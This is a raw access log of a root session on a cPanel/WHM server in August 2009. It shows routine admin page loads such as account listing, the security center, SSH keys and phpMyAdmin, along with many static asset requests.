188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/restartservices.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1143069318/minus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1186549335/themes/x/images/arrow-up.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1181098613/themes/x/header-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1192071000/themes/x/breadcrumb_bg.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1181098615/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/topframe/bgtd.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:46 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:47 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/images/acct.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:47 -0000] "GET /cPanel_magic_revision_1231994881/yui/datatable/assets/skins/sam/datatable.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:47 -0000] "GET /cPanel_magic_revision_1143069318/plus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:47 -0000] "GET /cPanel_magic_revision_1192071000/images/cpanel.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:47 -0000] "GET /cPanel_magic_revision_1143069318/change.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:48 -0000] "GET /cPanel_magic_revision_1187131675/js/sorttable.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:48 -0000] "GET /cPanel_magic_revision_1181098615/images/tbl-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:48 -0000] "GET /cPanel_magic_revision_1231994884/yui/assets/skins/sam/sprite.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994881/yui/datatable/assets/skins/sam/datatable.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:48 -0000] "GET /cPanel_magic_revision_1204772828/yui/datatable/assets/skins/sam/dt-arrow-up.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994881/yui/datatable/assets/skins/sam/datatable.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:20:39 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:21:20 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:21:47 -0000] "GET /scripts/edituser?domain=webhostline.com&user=webhostl HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:21:49 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:21:57 -0000] "GET /scripts2/top HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:01 -0000] "GET /cPanel_magic_revision_1181098613/themes/x/bg.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/top" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:04 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:04 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:45 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:52 -0000] "GET /scripts2/securitycenter HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:54 -0000] "GET /cPanel_magic_revision_1181098615/images/sshpass.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/securitycenter" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:54 -0000] "GET /cPanel_magic_revision_1181098615/images/hostaccess.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/securitycenter" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:54 -0000] "GET /cPanel_magic_revision_1181098615/images/php_openbasedir.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/securitycenter" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:54 -0000] "GET /cPanel_magic_revision_1181098615/images/cphulk.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/securitycenter" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:54 -0000] "GET /cPanel_magic_revision_1181098615/images/compilers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/securitycenter" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:54 -0000] "GET /cPanel_magic_revision_1181098614/images/apache_moduserdir.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/securitycenter" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:54 -0000] "GET /cPanel_magic_revision_1181098615/images/traceroute.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/securitycenter" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:54 -0000] "GET /cPanel_magic_revision_1181098615/images/smtp.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/securitycenter" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:54 -0000] "GET /cPanel_magic_revision_1181098615/images/bombs.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/securitycenter" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:56 -0000] "GET /scripts2/tweaksshauth HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/securitycenter" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:56 -0000] "GET /cPanel_magic_revision_1181098609/themes/x/images/sshpass.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/tweaksshauth" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:22:58 -0000] "GET /scripts2/securitycenter HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:23:11 -0000] "GET /scripts2/sshkeys HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:23:12 -0000] "GET /images/add.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/sshkeys" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:23:12 -0000] "GET /images/importkey.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts2/sshkeys" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:23:12 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:23:17 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/images/wheel.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:23:26 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:23:46 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:24:06 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:24:48 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:03 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:04 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/images/editsetup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:06 -0000] "GET /cPanel_magic_revision_1231994886/yui/utilities_container/utilities_container.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:08 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:16 -0000] "GET /cPanel_magic_revision_1181098615/images/button-bg-over.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:24 -0000] "GET /3rdparty/phpMyAdmin/index.php? HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:26 -0000] "GET /3rdparty/phpMyAdmin/js/querywindow.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:27 -0000] "GET /3rdparty/phpMyAdmin/navigation.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:28 -0000] "GET /3rdparty/phpMyAdmin/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:28 -0000] "GET /3rdparty/phpMyAdmin/main.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:28 -0000] "GET /3rdparty/phpMyAdmin/js/navigation.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:29 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=left&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:30 -0000] "GET /3rdparty/phpMyAdmin/print.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/main.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:30 -0000] "GET /xml-api/loadavg? HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:30 -0000] "GET /3rdparty/phpMyAdmin/js/functions.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:31 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/main.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:31 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/logo_left.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:32 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_selboard.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:33 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_docs.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:33 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_sqlhelp.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:33 -0000] "GET /3rdparty/phpMyAdmin/js/tooltip.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/main.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:33 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_home.png? HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:33 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/logo_right.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:33 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/s_host.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:33 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/item_ltr.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:25:33 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/s_asci.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
